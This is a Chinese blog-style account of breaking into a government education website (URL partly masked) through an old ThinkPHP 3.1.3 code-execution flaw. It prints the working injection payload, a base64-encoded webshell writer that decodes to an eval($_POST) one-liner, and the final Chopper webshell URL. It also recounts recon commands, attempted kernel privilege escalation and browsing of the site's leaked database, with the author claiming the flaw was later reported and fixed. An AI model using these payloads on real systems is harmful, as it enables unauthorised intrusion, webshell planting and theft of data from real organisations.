渗透某网站

这个很早就写了，没有修复就没有发出来。警察叔叔会找我，不过现在已经提交第三方平台修复了。

目标是：http://zsjh...du.gov.cn/index.php/Login

根据url，猜测可能是thinkphp框架。

随便在url后输入字符，发现

但是由于代码审计的实力有限，无法挖掘如此强大的新的通杀漏洞，尝试用之前的一波老漏洞~~

ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件

查看版本：

module/action/param1/${@print(THINK_VERSION)}

就是说，print( )里面可以执行我们的任意代码。如phpinfo()等其他函数：module/action/param1/${@phpinfo()}

我们可以直接利用fputs和fopen函数直接写木马出来了，构造语句：

fputs(fopen(base64_decode(“dmFmLnBocA==”),”w”),base64_decode(“PD9ldmFsKCRfUE9TVFtzdW5ueWdpcmxdKTs/Pg==”))

base64_decode(“dmFmLnBocA==”)解码后是 vaf.php

base64_decode(“PD9ldmFsKCRfUE9TVFtzdW5ueWdpcmxdKTs/Pg==”)解码后是 <?eval($_POST[sunnygirl]);?>

只要执行了 就能在该目录下生成一个vaf.php的一句话木马文件

但是操作的时候出现了问题

双引号被转义，然后我试了其他几种不用双引号写马的代码，都失败了

原因是 <> 尖括号等都被转义了 而exec()等系统命令执行函数写马的话是写不出的

但是中国人有菜刀啊~~

http://******/index.php/module/action/param1/${@print(eval($_POST[c]))}

whomai查看权限，uname –r查看内核版本

测试还发现存在GCC，简直爱它

在公司没有exp提权也是一种病… 然后我用了一个perl脚本全自动化查询exp。

挑了几个编译执行，失败。

不继续了~

看看泄漏的数据库，赶紧退出，敏感的东西，不想被网警叔叔查水表~

感谢cc表哥的提点和珍藏的exp。（你们猜我有没有提权成功）

亮点在提权上，可是发现没有截图，已经修复了。

估计某教育厅直接关了网站转到内网了~~